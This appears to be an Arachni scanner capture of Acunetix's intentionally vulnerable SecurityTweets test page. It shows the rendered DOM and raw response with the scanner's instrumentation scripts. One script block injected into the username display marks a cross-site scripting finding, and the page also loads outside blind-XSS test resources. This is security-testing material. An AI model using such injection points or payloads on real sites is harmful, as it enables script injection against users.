Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
Welcome <b></script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</b> | <a href='/logout'>Logout</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
| <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="-1655945266"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by 
Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span 
class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> Welcome <b> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </b> | <a href="/logout" data-arachni-id="-2013462102">Logout</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" 
href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... 
<i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div data-ng-include="'/static/app/partials/itemsList.html'" class="ng-scope"><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> </div> <div class="pull-right"> <div ng-show="filter==''">Page <span ng-bind-html-unsafe="pageStr" style="font-weight: bold;" class="ng-binding">0</span> </div> </div> <div class="pull-right"> <div ng-show="filter!=''" style="display: none;">Filtering for host <b class="ng-binding"></b></div> </div> </div> <!-- ngRepeat: item in items | filter:filter | filter:searchText --><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div 
class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/twitter.com" class="ng-binding" href="#/all/filter/twitter.com" data-arachni-id="-1830313082">twitter.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=696a3680438a7af53a0a54d3d26469bf" href="/like?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=696a3680438a7af53a0a54d3d26469bf" href="/comment?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=696a3680438a7af53a0a54d3d26469bf" href="/report?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872" href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well 
well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/www.eff.org" class="ng-binding" href="#/all/filter/www.eff.org" data-arachni-id="-313525244">www.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=6cc95ec82a3e1524115d692b9386d60a" href="/like?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=6cc95ec82a3e1524115d692b9386d60a" href="/report?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" 
href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/ssd.eff.org" class="ng-binding" href="#/all/filter/ssd.eff.org" data-arachni-id="-947703951">ssd.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a 
ng-href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios" href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/blog.github.com" class="ng-binding" href="#/all/filter/blog.github.com" data-arachni-id="1782715074">blog.github.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" 
href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/github" target="_blank" class="ng-binding" href="http://twitter.com/github" data-arachni-id="-279974877">@github</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. 
<br><br> </div> </div> </div> </div> <ul class="pager ng-scope"> <li><a ng-href="#/popular/page/-1" ng-show="page>0" href="#/popular/page/-1" style="display: none;">Previous</a></li> <li><a ng-href="#/popular/page/1" ng-show="filter==''" href="#/popular/page/1" data-arachni-id="2424595">Next</a></li> </ul></div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">admin is coming from <b>unknown</b> and has visited this page <b>14</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 
2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); 
_arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html> |
This is the original HTTP response body.
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta 
